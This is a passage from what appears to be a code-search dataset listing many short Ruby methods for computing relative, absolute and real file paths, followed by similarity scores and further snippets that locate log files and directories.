"def relative_path_to(path, relative_to = nil)\n if relative_to\n path = File.expand_path(\n # symlink, e.g. \"../../../../grid5000/environments/etch-x64-base-1.0.json\"\n path,\n # e.g. : File.join(\"/\", File.dirname(\"grid5000/sites/rennes/environments/etch-x64-base-1.0\"))\n File.join('/', File.dirname(relative_to))\n ).gsub(%r{^/}, '')\n end\n path\n end",
"def relative_path(pathname)\n pwd = Pathname.new('.').realpath\n pathname.file_ref.real_path.relative_path_from(pwd)\n end",
"def rel_path(path)\n Pathname(path).expand_path.relative_path_from(Pathname(Dir.pwd))\n end",
"def relativePath\n return (parentPathElements + [name]).join(\"/\")\n end",
"def relative_path\n @relative_path ||= absolute_path.sub(/^#{Bookshelf::remote_folder}\\/?/,'')\n end",
"def relative_path(path)\n\t\tSass::Script::String.new(File.join(File.expand_path(Dir.pwd), path.value))\n\tend",
"def relative_path(target = '.')\n my_path = Pathname.new(path).expand_path\n target_path = Pathname.new(target.to_s).expand_path\n target_path = target_path.dirname if target_path.file?\n\n new_path = my_path.relative_path_from(target_path).to_s\n\n return new_path if new_path.index('.') == 0\n \"./#{new_path}\"\n end",
"def relative_path(target = '.')\n my_path = Pathname.new(path).expand_path\n target_path = Pathname.new(target.to_s).expand_path\n target_path = target_path.dirname if target_path.file?\n\n new_path = my_path.relative_path_from(target_path).to_s\n\n return new_path if new_path.index('.') == 0\n \"./#{new_path}\"\n end",
"def get_absolute_path(file)\n File.expand_path file\nend",
"def relative_path\n name\n end",
"def resolve_path(path, reference)\n # Absolute URL\n if path =~ %r{^(/|[a-z]+:)}\n if @options[:document_root].nil?\n msg = \"Cannot resolve absolute path '#{path}' without document root option\"\n raise ArgumentError.new(msg)\n end\n\n path.sub!(%r{^[a-z]+://[^/]+/}, '')\n return File.expand_path(File.join(@options[:document_root], path))\n end\n\n File.expand_path(File.join(File.dirname(reference), path))\n end",
"def relative_path(filename)\n pieces = split_filename(File.expand_path(filename))\n File.join(pieces[@mount_dir_pieces.size..-1])\n end",
"def relative_path(path)\n path = destination_root.relative_path(path) || path\n path.empty? ? \".\" : path\n end",
"def relative_dir(path, *args)\n relative_path = args ? args.join('/') : ''\n Pathname(path).dirname.join(relative_path)\n end",
"def full_path_for(path)\n path = \"/#{path}\" unless path[0..0] == '/'\n path\n end",
"def absolute_path_base\n absolute_path.gsub File.extname( absolute_path ), ''\n end",
"def relative_pathname\n @relative_pathname ||= Pathname.new(relativize_root_path(pathname))\n end",
"def relative_path(path)\n path[self.prefix.size..-1].gsub(%r{^/}, '').tap do |pth|\n #puts \"self.prefix=#{self.prefix}, path=#{path}, result=#{pth}\"\n end\n end",
"def relative_path(path)\n path = File.expand_path(File.dirname(__FILE__) + '/' + path)\n \"'#{path}'\"\nend",
"def path(*relative)\n File.join(self.bundle_dir, *relative)\n end",
"def relroot\n Pathname.new(File.expand_path(path)).\n relative_path_from(Pathname.new(File.expand_path(root))).to_s\n end",
"def abspath(path)\n Pathname.new(File.expand_path(path)).realpath.to_s\n end",
"def to_absolute_path(file, dir_str)\n Pathname.new(file).absolute? ? file : File.expand_path(file, dir_str)\n end",
"def relative_directory; end",
"def append_to_home_if_not_absolute( p )\n path = Pathname.new( p )\n unless path.absolute? then\n path = Pathname.new( home_dir ) + path\n end\n return path.to_s\n end",
"def absolutepath\n if absolute?\n self\n elsif to_s == \".\"\n realpath\n else\n parent.absolutepath + self.basename\n end\n end",
"def relative_path(p = path)\n anchor = p.ftype == \"directory\" ? @root_path : \"public\"\n p.relative_path_from(Pathname.new(anchor).realpath)\n end",
"def realpath(*args)\n unless args.empty?\n warn \"The argument for Pathname#realpath is obsoleted.\"\n end\n force_absolute = args.fetch(0, true)\n\n\t\t# XXX: see http://wiki.rubyonrails.com/rails/pages/Gotcha\n is_absolute = %r{\\A/}\n\t\ttop = '/'\n\t\tif Config::CONFIG['arch'] =~ %r{mswin32}i\n\t\t\tis_absolute = %r{\\A[A-Za-z]:/}\n\t\t\ttop = ''\n\t\tend\n if is_absolute =~ @path\n unresolved = @path.scan(%r{[^/]+})\n elsif force_absolute\n # Although POSIX getcwd returns a pathname which contains no symlink,\n # 4.4BSD-Lite2 derived getcwd may return the environment variable $PWD\n # which may contain a symlink.\n # So the return value of Dir.pwd should be examined.\n unresolved = Dir.pwd.scan(%r{[^/]+}) + @path.scan(%r{[^/]+})\n else\n top = ''\n unresolved = @path.scan(%r{[^/]+})\n end\n resolved = []\n\n until unresolved.empty?\n case unresolved.last\n when '.'\n unresolved.pop\n when '..'\n resolved.unshift unresolved.pop\n else\n loop_check = {}\n while (stat = File.lstat(path = top + unresolved.join('/'))).symlink?\n symlink_id = \"#{stat.dev}:#{stat.ino}\"\n raise Errno::ELOOP.new(path) if loop_check[symlink_id]\n loop_check[symlink_id] = true\n if %r{\\A/} =~ (link = File.readlink(path))\n top = '/'\n unresolved = link.scan(%r{[^/]+})\n else\n unresolved[-1,1] = link.scan(%r{[^/]+})\n end\n end\n next if (filename = unresolved.pop) == '.'\n if filename != '..' && resolved.first == '..'\n resolved.shift\n else\n resolved.unshift filename\n end\n end\n end\n\n if top == '/'\n resolved.shift while resolved[0] == '..'\n end\n \n if resolved.empty?\n Pathname.new(top.empty? ? '.' : '/')\n else\n Pathname.new(top + resolved.join('/'))\n end\n end",
"def rel relative_path\r\n return File.dirname(__FILE__) + \"/../\" + relative_path\r\nend",
"def cleaned_relative_path; end",
"def cleaned_relative_path; end",
"def relative_path\n @local_path.relative_path_from(@platform.local_path)\n end",
"def relative_path(val = NULL)\n if null?(val)\n @relative_path || \".\"\n else\n @relative_path = val\n end\n end",
"def ref_path(dir, subdir, path)\n # this stuff is overkill, and doesn't work anyways:\n #depth = dir.split(File::SEPARATOR).reject{ |d| d.empty? }.count\n #parent_dirs = Array.new(depth, '..')\n File.join('..', ContentRepo::ResourceNode::PATHNAME, path )\n end",
"def relativepath(abspath, relativeto)\n path = abspath.split(File::SEPARATOR)\n rel = relativeto.split(File::SEPARATOR)\n while (path.length > 0) && (path.first == rel.first)\n path.shift\n rel.shift\n end\n ('..' + File::SEPARATOR) * (rel.length - 1) + path.join(File::SEPARATOR)\n end",
"def explicit_relative(path)\n # Paths that do not start with \"/\", \"./\", or \"../\" will be prefixed with ./\n path.sub(%r(^(?!\\.{0,2}/)), './')\n end",
"def relative_file_path(file_path)\n file_path.gsub(/#{pwd}\\//, '')\n end",
"def abspath\n \"#{repo_base_path}/#{self.git_repo_path}\"\n end",
"def relativize_path(path)\n path.to_s.gsub(/^\\/?#{Regexp.escape(root_path.to_s)}\\/?/, '')\n end",
"def relativize( path ) # :doc:\n p = Pathname.new( path )\n unless p.relative?\n p = p.relative_path_from( Pathname.pwd ).to_s\n p += '/' if path[-1] == '/'\n path = p if p.length < path.length\n end\n path\n end",
"def full_path\n container.root.join(path)\n end",
"def full_path\n container.root.join(path)\n end",
"def get_relative_path(bag_path_string)\n bag_path = Pathname.new bag_path_string\n loc_path = Pathname.new @base_path\n \n return bag_path.relative_path_from(loc_path)\n end",
"def to_absolute_path\n File.join('', to.path(:default).to_s)\n end",
"def path\n @path ||= filters.uri_escape(absolute_url) if absolute_url\n end",
"def path\n @path ||= filters.uri_escape(absolute_url) if absolute_url\n end",
"def relativePath\n #N Without this the path elements won't be joined together with \"/\" to get the relative path as a single string\n return @pathElements.join(\"/\")\n end",
"def relative_path\n @relative_path ||= path.sub(\"#{site.collections_path}/\", \"\")\n end",
"def realpath\n if(self.page)\n return Rails.application.routes.url_helpers.page_path(self.page)\n end\n '/' + self.explicit_path\n end",
"def path_from(relative_path)\n path.sub(/^#{Regexp.escape(relative_path)}\\/?/, '')\n end",
"def path_from(relative_path)\n path.sub(/^#{Regexp.escape(relative_path)}\\/?/, '')\n end",
"def relative_to_bucket_path(rel_path)\n raise ArgumentError.new(\"Must provide a non-nil path\") if rel_path.nil?\n \n if @subpath_prefix.nil?\n return rel_path\n end\n \n @subpath_prefix + rel_path\n end",
"def realpath(*args)\n unless args.empty?\n warn \"The argument for Path::Name#realpath is obsoleted.\"\n end\n force_absolute = args.fetch(0, true)\n\n if @path.first == ''\n top = '/'\n unresolved = @path.slice(1..-1) #.scan(%r{[^/]+})\n elsif force_absolute\n # Although POSIX getcwd returns a pathname which contains no symlink,\n # 4.4BSD-Lite2 derived getcwd may return the environment variable $PWD\n # which may contain a symlink.\n # So the return value of Dir.pwd should be examined.\n top = '/'\n unresolved = Dir.pwd.split(%r{/}) + @path\n else\n top = ''\n unresolved = @path.dup #.scan(%r{[^/]+})\n end\n resolved = []\n\n until unresolved.empty?\n case unresolved.last\n when '.'\n unresolved.pop\n when '..'\n resolved.unshift unresolved.pop\n else\n loop_check = {}\n while (stat = File.lstat(path = top + unresolved.join('/'))).symlink?\n symlink_id = \"#{stat.dev}:#{stat.ino}\"\n raise Errno::ELOOP.new(path) if loop_check[symlink_id]\n loop_check[symlink_id] = true\n if %r{\\A/} =~ (link = File.readlink(path))\n top = '/'\n unresolved = link.split(%r{/}) #scan(%r{[^/]+})\n else\n unresolved[-1,1] = link.split(%r{/}) #.scan(%r{[^/]+})\n end\n end\n next if (filename = unresolved.pop) == '.'\n if filename != '..' && resolved.first == '..'\n resolved.shift\n else\n resolved.unshift filename\n end\n end\n end\n\n if top == '/'\n resolved.shift while resolved[0] == '..'\n end\n\n if resolved.empty?\n Path::Name.new(top.empty? ? '.' : '/')\n else\n if top.empty?\n Path::Name.new(resolved)\n else\n Path::Name.new(resolved, true)\n end\n end\n end",
"def getFullPath(relativePath)\n return @baseDirectory.fullPath + relativePath\n end",
"def full_path; end",
"def relative_path\n File.join(@repo, @bundle)\n end",
"def relative_path(filename)\n @mount_dir_pieces ||= @mount_dir.size\n pieces = split_filename(File.expand_path(filename))\n File.join(pieces[@mount_dir_pieces..-1])\n end",
"def relative_path_from(entry)\n @path.relative_path_from(entry.path)\n end",
"def relative_path\n @relative_path ||= File.join(@dir, @target)\n end",
"def full_path\n path\n end",
"def relative_path(path_to, path_from)\n path_from ||= \"\"\n path_to = Pathname.new(path_to)\n dir_from = Pathname.new(path_from).dirname\n\n path_to.relative_path_from(dir_from).to_s\n end",
"def base_dir_for_path_parameters; end",
"def getRealPath(path) Pathname.new(path).realpath.to_s; end",
"def getRealPath(path) Pathname.new(path).realpath.to_s; end",
"def relative_directory\n @relative_directory ||= \"_#{label}\"\n end",
"def home(subcomponent = \"\")\n File.expand_path(\"#{@basepath}/#{subcomponent}\")\n end"
] | [
"0.7357174",
"0.7348903",
"0.73462665",
"0.7299915",
"0.7296331",
"0.72358",
"0.71377474",
"0.7120952",
"0.7062218",
"0.704706",
"0.70403504",
"0.70403504",
"0.70402324",
"0.7012378",
"0.7000483",
"0.7000483",
"0.6994019",
"0.69636405",
"0.69636405",
"0.69636405",
"0.69636405",
"0.69636405",
"0.695129",
"0.6946913",
"0.6931151",
"0.6917314",
"0.6911458",
"0.6898736",
"0.6858941",
"0.6848206",
"0.68465906",
"0.68410844",
"0.68290734",
"0.68237805",
"0.6815903",
"0.6809527",
"0.6797236",
"0.6797128",
"0.6791335",
"0.6784773",
"0.6765788",
"0.6758406",
"0.6758406",
"0.6754318",
"0.67079383",
"0.6687116",
"0.66837204",
"0.6680274",
"0.66762936",
"0.6652575",
"0.6641354",
"0.6633439",
"0.6631779",
"0.66313505",
"0.6611076",
"0.6610232",
"0.6601402",
"0.65852916",
"0.65772736",
"0.65608597",
"0.6544328",
"0.6539652",
"0.6514666",
"0.6510255",
"0.65079427",
"0.65079427",
"0.64619076",
"0.64582837",
"0.6444969",
"0.64445454",
"0.6436225",
"0.6413355",
"0.64117026",
"0.6404726",
"0.64042956",
"0.6402828",
"0.6402828",
"0.64012736",
"0.6387289",
"0.6385002",
"0.6385002",
"0.6378417",
"0.63739824",
"0.63732547",
"0.6369799",
"0.6369799",
"0.63689786",
"0.63578415",
"0.63570845",
"0.63408315",
"0.6338654",
"0.63339907",
"0.6331882",
"0.6323448",
"0.63227093",
"0.6321696",
"0.63170934",
"0.63032794",
"0.63032794",
"0.62953454",
"0.6288676"
] | 0.0 | -1 |
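
A sketch of the Pathname composition used by the path document above: Pathname#+ joins components, so reduce(:+) folds a root and any number of relative parts into one absolute path. The root value below is an assumed example, not taken from the record.

require 'pathname'

dir  = Pathname.new('/opt/brewed')             # assumed brewed root
full = [dir, 'etc', 'config.yml'].reduce(:+)   # Pathname#+ joins each part
puts full                                      # => /opt/brewed/etc/config.yml
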
Provide an absolute pathname within the brewed's public directory tree. | def public(*path)
_public.nil? ? nil : [_public, *path].reduce(:+)
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def absolute_path(path)\n File.join(self.mounting_point.path, 'public', path)\n end",
"def public_path=(_arg0); end",
"def absolute_url\n domain + path\n end",
"def public_path\n # TODO: this might present an attack vector if the file is outside the web_root\n options[:web_root].to_s + '/' + self.relative_path.gsub(\"\\\\\", \"/\")\n end",
"def public_path_for(sling)\n return home_path_for(sling) + \"/public\"\n end",
"def abspath path\n if path[0] != '/'\n @homedir + '/' + path\n else\n path\n end\n end",
"def relative_directory; end",
"def abspath\n \"#{repo_base_path}/#{self.git_repo_path}\"\n end",
"def absolute_url\n return unless fileable?\n Rails.application.routes.default_url_options[:host] ||= \"http://localhost:3000\"\n Rails.application.routes.url_helpers.root_url[0..-2] + file.url\n end",
"def local_uri\n\n return nil unless self.uri\n u = full_uri\n u[0, 1] == '/' ? \"#{RAILS_ROOT}/public#{u}\" : u\n end",
"def absolute_uri_path(path)\n \"#{root_uri}#{path}\"\n end",
"def public_uri\n @public_uri ||= begin\n path = @rack_context.getInitParameter('public.root') || '/'\n path = \"/#{path}\" if path[0, 1] != '/'\n path.chomp!('/') unless path == '/'\n path\n end\n end",
"def relative_path\n @relative_path ||= absolute_path.sub(/^#{Bookshelf::remote_folder}\\/?/,'')\n end",
"def public_path; end",
"def public_path; end",
"def public_path; end",
"def basepath; end",
"def relative_path_from(from); end",
"def url; \"file:#{@root}\"; end",
"def abspath(file)\n File.absolute_path(file)\nend",
"def relative_directory\n return '' unless @directory_root\n @path - @directory_root - name\n end",
"def absolute_path(options = {})\n if !@absolute_path\n # Pre-conditions\n raise ArgumentError.new(\"No document root set\") if @document_root.nil?\n\n @absolute_path = filename.sub(%r{^#@document_root}, '').sub(/^\\/?/, '/')\n @absolute_path = \"#{Juicer::Asset::Path.host_with_scheme(options[:host])}#@absolute_path\"\n end\n\n path_with_cache_buster(@absolute_path, options)\n end",
"def relative_path; end",
"def relative_path; end",
"def relative_path; end",
"def relative_path; end",
"def relative_path; end",
"def absolute_import_dir\n File.join(Merb.root, \"public#{relative_import_dir}\")\n end",
"def url\n filepath.sub( %r{\\A#{Regexp.escape (Rails.root + \"public\").to_s}}, '').to_s\n end",
"def full_path\n container.root.join(path)\n end",
"def full_path\n container.root.join(path)\n end",
"def _uri_path\n \"#{@dir}.#{CGI.escape @reg}/#{CGI.escape @dss}\"\n end",
"def URLFor(locationRef)\n theLocation = NSFileManager.defaultManager\n .URLsForDirectory( locationRef,\n inDomains: NSUserDomainMask)\n .first\n theLocation.nil? ? NSURL.fileURLWithPath(NSHomeDirectory()) : theLocation\nend",
"def append_to_home_if_not_absolute( p )\n path = Pathname.new( p )\n unless path.absolute? then\n path = Pathname.new( home_dir ) + path\n end\n return path.to_s\n end",
"def fullpath; end",
"def absolutize_path(path = nil)\n \"#{root_path}#{path}\"\n end",
"def path\n @path ||= filters.uri_escape(absolute_url) if absolute_url\n end",
"def path\n @path ||= filters.uri_escape(absolute_url) if absolute_url\n end",
"def relative_url_root=(_arg0); end",
"def relative_url_root=(_arg0); end",
"def public_uri\n @public_uri ||=\n @rack_context.getInitParameter('public.root') || 'public'\n end",
"def relative_path(p = path)\n anchor = p.ftype == \"directory\" ? @root_path : \"public\"\n p.relative_path_from(Pathname.new(anchor).realpath)\n end",
"def public_path path, strict=true\n path_under 'public', path, strict\n end",
"def link_name(name)\n File.expand_path(File.join('~', '.' + File.basename(name)))\nend",
"def root_path(path) File.join(root, path) end",
"def absolute_url\n\t\treturn \"#{$domain}/#{self.photo.url}\"\n\tend",
"def relative_path(from, to); end",
"def home(subcomponent = \"\")\n File.expand_path(\"#{@basepath}/#{subcomponent}\")\n end",
"def full_path; end",
"def public_path\n raise \"An Entry must define a `public_path` in its Spec.\"\n end",
"def construct_document_root\n return Dir.pwd + \"/public\"\n end",
"def base_path\n @base_path ||= self.class.respond_to?(:base_path) ? self.class.base_path : Merb.dir_for(:public)\n end",
"def url\n ::File.join \"/\", path.to_s\n end",
"def absolute_path(path)\n path = Pathname.new(path)\n return Pathname.new(@config.base_path) + path unless path.absolute?\n path\n end",
"def relative_url_root; end",
"def relative_url_root; end",
"def relative_url_root; end",
"def root_file_path; end",
"def base_path\n Dir.pwd + \"/\"\n end",
"def public_path\n application && Pathname.new(application.paths[\"public\"].first)\n end",
"def path_in_public\n (sitemaps_path + filename).to_s\n end",
"def path\n (public_path + sitemaps_path + filename).expand_path.to_s\n end",
"def absolute_path\n if is_url?\n # Use the last path component without the query string plus the name\n # of the resource in Base64. This should be both mildly readable and\n # also unique per invocation.\n url_part = URI(path).path.split(/\\//).last\n base64_name = Base64.strict_encode64(name).gsub(/\\=/, '')\n ::File.join(Chef::Config[:file_cache_path], \"#{base64_name}_#{url_part}\")\n else\n ::File.expand_path(path, Chef::Config[:file_cache_path])\n end\n end",
"def to_absolute_path\n File.join('', to.path(:default).to_s)\n end",
"def public_path\n File.join adapter_folder, relative_folder\n end",
"def getRealPath(path) Pathname.new(path).realpath.to_s; end",
"def getRealPath(path) Pathname.new(path).realpath.to_s; end",
"def get_url(is_local = true)\n is_local ? (return '../../../www/public/') : (return 'https://whimsy.apache.org/public/')\n end",
"def href\n \"/admin/dav/#{path}\"\n end",
"def public_path\n @public_path ||= './public'\n end",
"def base_dir; end",
"def base_dir; end",
"def base_dir; end",
"def base_dir; end",
"def base_dir; end",
"def base_dir; end",
"def base_dir; end",
"def absolute?; !scheme.nil?; end",
"def linked_path\n File.readlink current_directory\n end",
"def absolute_path(path, reference = @pwd)\n path = File.expand_path(File.join(reference, path)) unless path.start_with? '/'\n path\n end",
"def public_rdf_storage_path\n rdf_storage_path 'public'\n end",
"def path\n \"repos/#{@user}/#{name}\"\n end",
"def get_absolute_path(file)\n File.expand_path file\nend",
"def path()\n return ::File.join(@root, @name)\n end",
"def path\n return File.join('', @public_path)\n end",
"def relative_path\n return self.avatar.match(/http[^|]*/)[0].to_s\n end",
"def absolute_url_for(uri, str)\n # TODO: use URI.parse() for better handling?\n return str if str =~ /^[|[:alpha:]]+:\\/\\//\n File.join(((uri.path.empty?) ? uri.to_s : File.dirname(uri.to_s)), \n str)\n end",
"def dir_alias()\n #This is a stub, used for indexing\n end",
"def sanitized_path(base_directory, questionable_path); end",
"def sanitized_path(base_directory, questionable_path); end",
"def sanitized_path(base_directory, questionable_path); end",
"def sanitized_path(base_directory, questionable_path); end",
"def sanitized_path(base_directory, questionable_path); end",
"def sanitized_path(base_directory, questionable_path); end",
"def directory\n (public_path + sitemaps_path).expand_path.to_s\n end",
"def absolute_url\n File.join(BLOG.url, url)\n end",
"def root( *args )\n if self.home =~ /^[a-zA-Z]:/\n self.home.to_s[0..3].fwf_filepath.join( *args )\n else\n \"/\".fwf_filepath.join( *args )\n end\n end",
"def public_path(options={})\n self.public_url\n end",
"def path\n @absolute_path.sub(%r{^#{Slimdown.config.location}/(.*)\\.md}, '\\1')\n end",
"def private_bin_dir\n return pretty_path(File.join(right_link_home_dir, 'bin'))\n end",
"def relative_path(options = {})\n File.join(self.site.content_dir(options), sanitize_filename(self.name))\n end"
] | [
"0.72411776",
"0.6842936",
"0.6810786",
"0.6754875",
"0.6727674",
"0.6700948",
"0.6620673",
"0.65827525",
"0.65568286",
"0.6503647",
"0.6487266",
"0.64696175",
"0.6449953",
"0.64441746",
"0.64441746",
"0.64441746",
"0.63983196",
"0.63731486",
"0.6365032",
"0.6364572",
"0.635311",
"0.63520664",
"0.6350717",
"0.6350717",
"0.6350717",
"0.6350717",
"0.6350717",
"0.6343104",
"0.6296191",
"0.62749004",
"0.62749004",
"0.62536263",
"0.6211883",
"0.62076277",
"0.6204191",
"0.61957824",
"0.6181119",
"0.6181119",
"0.6173139",
"0.6173139",
"0.61716014",
"0.61641747",
"0.61632526",
"0.6159094",
"0.6156053",
"0.6147174",
"0.61358654",
"0.61354995",
"0.61290354",
"0.61245704",
"0.6122677",
"0.6121278",
"0.6110789",
"0.6106721",
"0.610217",
"0.610217",
"0.610217",
"0.6100734",
"0.6100135",
"0.60883725",
"0.6084727",
"0.6079796",
"0.6073108",
"0.6066334",
"0.604829",
"0.6048018",
"0.6048018",
"0.60335857",
"0.6028245",
"0.60161746",
"0.6008993",
"0.6008993",
"0.6008993",
"0.6008993",
"0.6008993",
"0.6008993",
"0.6008993",
"0.6004936",
"0.6004735",
"0.5997278",
"0.59956056",
"0.5991994",
"0.5988158",
"0.59860307",
"0.5975274",
"0.59731245",
"0.59644717",
"0.5961942",
"0.5961641",
"0.5961641",
"0.5961641",
"0.5961641",
"0.5961641",
"0.5961641",
"0.5947674",
"0.5931356",
"0.593094",
"0.59274983",
"0.5926701",
"0.59239143",
"0.5923749"
] | 0.0 | -1 |
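
A sketch of the nil-guarded variant in the public document above: when the public root is unset, the accessor returns nil rather than raising. The root value is an assumption for illustration.

require 'pathname'

public_root = Pathname.new('/opt/brewed/public')  # may be nil when unconfigured
asset = public_root.nil? ? nil : [public_root, 'css', 'site.css'].reduce(:+)
puts asset.inspect  # => #<Pathname:/opt/brewed/public/css/site.css> (or nil)
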
Provide the absolute path to the directory containing the log files. | def log(*path)
[log_root, *path].reduce(:+)
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def log_path\n case Merb::Config[:log_file]\n when String then File.dirname(Merb::Config[:log_file])\n else Merb.root_path(\"log\")\n end\n end",
"def log_path\n case Merb::Config[:log_file]\n when String then File.dirname(Merb::Config[:log_file])\n else Merb.root_path(\"log\")\n end\n end",
"def log_directory\n File.join(@relative_to_base, LOG_DIRECTORY_NAME)\n end",
"def log_directory\n @relative_location.end_with?('/') ? @relative_location + LOG_DIRECTORY_NAME : @relative_location + '/' + LOG_DIRECTORY_NAME\n end",
"def log_path\n @options['log_path'] ? File.expand_path(@options['log_path'], @config.root) : default_log_path\n end",
"def log_dir\n return pretty_path(File.join(Dir::COMMON_APPDATA, 'RightScale', 'log'))\n end",
"def log_path(name, log_dir)\n # TODO ?\n end",
"def path_log\n @path_log ||= File.join(folder, 'log.txt')\n end",
"def logdir\n File.expand_path(\"../../../log/library/#{id}\", File.dirname(__FILE__))\n end",
"def log_directory\n @log_directory ||= begin\n Rails.root.join('log')\n rescue => e\n File.join Dir.pwd, 'log'\n end\n end",
"def default_log_path\n if @config.log_root\n File.join(@config.log_root, default_log_file_name)\n else\n nil\n end\n end",
"def log_root\n @log_root ||= File.expand_path(\"../../log\", __FILE__)\n end",
"def log_file(log_path = nil)\n # Get hostname\n host = session.sys.config.sysinfo[\"Computer\"]\n\n # Create Filename info to be appended to downloaded files\n filenameinfo = \"_\" + ::Time.now.strftime(\"%Y%m%d.%M%S\")\n\n # Create a directory for the logs\n logs = if log_path\n ::File.join(log_path, 'logs', 'persistence', Rex::FileUtils.clean_path(host + filenameinfo))\n else\n ::File.join(Msf::Config.log_directory, 'persistence', Rex::FileUtils.clean_path(host + filenameinfo))\n end\n\n # Create the log directory\n ::FileUtils.mkdir_p(logs)\n\n # logfile name\n logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + \".rc\"\n logfile\n end",
"def get_log_dir()\n \"#{node[:neon_logs][:flume_log_dir]}/#{node[:neon_logs][:flume_service_name]}\"\n end",
"def default_log_file_location\n File.join(::Rails.root, 'log', \"solr_\" + ::Rails.env + \".log\")\n end",
"def log\n \"#{self.dir}.log\"\n end",
"def log_filename\n date_str = `date +%d%b%Y`[0..-2]\n LOG_DIR + \"Log#{date_str}.log\"\nend",
"def log_file\n File.join(FileUtils.pwd, 'log', \"sunspot-solr.log\")\n end",
"def self_log_file\n return File.join(File.dirname(__FILE__), 'sshsurveyor.log')\n end",
"def logFile\n\t\tlogDir = self.setting(\"postgres:log_directory\", LOG_DIR)\n\t\tlogFile = self.setting(\"postgres:log_filename\", LOG_FILE)\n\t\t$log.debug(\"Service log file is #{logDir}/#{logFile}\")\n\t\treturn \"#{logDir}/#{logFile}\"\n\tend",
"def log_path\n @_log ||= ::File.join('log', \"#{ENV.fetch('RACK_ENV')}.log\")\n\n ENV.fetch('LOG_FILE', @_log)\n end",
"def log_full_pathname( data_import_session )\n # Memo-ize the filename the first time this is called:\n @log_filename ||= File.join( Rails.root, 'log', \"#{ get_log_basename(data_import_session) }#{ get_log_extension(data_import_session) }\" )\n end",
"def log_path\n \n @log_path = \"doc/mylog/articles\"\n \n end",
"def setup_logfile\n # strip any trailing '/' in case the user supplied this as part of\n # an absolute path, so we can match it against File.expand_path()\n path = @options.log_path.chomp(\"/\")\n if path.empty?\n path = File.join(Backup::Config.root_path, \"log\")\n elsif path != File.expand_path(path)\n path = File.join(Backup::Config.root_path, path)\n end\n FileUtils.mkdir_p(path)\n log_file = @options.log_file || \"backup.log\"\n path = File.join(path, log_file)\n if File.exist?(path) && !File.writable?(path)\n raise Error, \"Log File at '#{path}' is not writable\"\n end\n\n path\n end",
"def create_log_file_path\r\n log_dir = File.join(SAF::LOG, File.dirname(test_path))\r\n log_file_pre = File.join(log_dir,\r\n File.basename(test_path, \".*\"))\r\n \"#{log_file_pre}_#{Time.now.strftime('%Y%m%d_%H%M%S')}.log\"\r\n end",
"def log_file\n end",
"def log_file\n get_value :logfile\n end",
"def dev_error_filepath\n \"parse_logs/#{study_file.id}/log.txt\"\n end",
"def default_log_root\n File.join(kitchen_root, Kitchen::DEFAULT_LOG_DIR)\n end",
"def log_file_path\n rails_root + \"/log/redis.log\"\n end",
"def log_path\n File.join(RIGHT_LINK_SPEC_HELPER_TEMP_PATH, '__nanite.log')\n end",
"def log_file\n File.dirname(__FILE__)+\"/../../log/#{Rails.env}_statsd.log\"\n end",
"def log_file\n @log_file ||= (user_configuration_from_key('solr', 'log_file') || default_log_file_location )\n end",
"def access_log_path\n @_access_log ||= ::File.join('log', \"#{ENV.fetch('RACK_ENV')}_access.log\")\n\n ENV.fetch('ACCESS_LOG_FILE', @_access_log)\n end",
"def log_file\n File.join(Dir.pwd, 'log', \"sunspot-solr-#{ENV['RACK_ENV']}.log\")\n end",
"def log_file; end",
"def log_file\n return @log_file\n end",
"def log_file(id)\n \"#{log_file_directory}/#{log_file_name(id)}\"\n end",
"def log_file\n @log_file ||= @options[:log_file] ? File.expand_path(@options[:log_file]) : File.join(Rails.root, 'log', \"#{rails_environment}.log\")\n end",
"def user_error_filepath\n \"parse_logs/#{study_file.id}/user_log.txt\"\n end",
"def set_log_file_path(data_file_path)\n PureHailDB.ib_cfg_set(\"log_group_home_dir\", :string, data_file_path)\n end",
"def log_file\n File.join(::Rails.root, 'log', \"sunspot-solr-#{::Rails.env}.log\")\n end",
"def diagnostics_directory\n File.join(@relative_location, DIAGNOSTICS_DIRECTORY_NAME)\n end",
"def logfilter_path\n dir = File.expand_path(\".\")\n while true\n file = File.join(dir,FILTER_FILENAME)\n return file if File.exist?(file)\n break if dir.length < 2\n dir = File.dirname(dir)\n end\n nil\n end",
"def files_dir\n return File.absolute_path(File.join(@root_dir, 'weather'))\n end",
"def find_log_file\n Dir[\"#{@simulation.run_path}/in.log\"].first\n end",
"def logName(fullPath); \"#{fullPath.chomp(File.extname(fullPath))}.log\" end",
"def log_file\n Vedeu::Configuration.log\n end",
"def log_file\n if Merb::Config[:log_file]\n Merb::Config[:log_file]\n elsif Merb.testing?\n log_path / \"merb_test.log\"\n elsif !(Merb::Config[:daemonize] || Merb::Config[:cluster])\n STDOUT\n else\n log_path / \"merb.#{Merb::Config[:port]}.log\"\n end\n end",
"def expand_directories\n options[:logfile] = File.expand_path(logfile) if logfile\n options[:pidfile] = File.expand_path(pidfile) if pidfile\n end",
"def log_filename\n log_file.nil? || log_file.empty? || log_file == '-' ? nil : log_file\n end",
"def get_file_path(filename)\n # dir = File.realdirpath(File.join(File.dirname(__FILE__), '..', 'config'))\n File.join(@dir, filename)\n end",
"def auth_log\n return './auth.log' if @cfg['run_mode'] == 'full_debug'\n\n AUTH_LOG_FILES.each { |log_file| return log_file if File.exists?(log_file) }\n\n return nil\n end",
"def log_file_creation()\n\tcurrent_path = File.dirname(File.realpath(__FILE__))\n\t$csv_path = \"#{current_path}/Attachments.csv\"\n\tif !File.directory?(\"#{current_path}/logs\")\n\t\tFileUtils.mkdir_p \"#{current_path}/logs\"\n\tend\n\t$log_path = \"#{current_path}/logs/jira-attachment-upload.txt\"\n\t$log = Logger.new(\"#{current_path}/logs/jira-attachment-upload.txt\", 'daily')\nend",
"def log_path\n rails_root = Rails.root\n \"#{rails_root}/log/.irb-history\"\nend",
"def get_run_dir()\n \"#{node[:neon_logs][:flume_run_dir]}/#{node[:neon_logs][:flume_service_name]}\"\n end",
"def file_path\n dir\n end",
"def log_path\n \"#{Rails.root}/tmp/nsc/#{id.to_s}/processing_log.log\" \n end",
"def log_directory\n '/var/log/tokyotyrant'\n end",
"def file_path\n File.join(dir,filename)\n end",
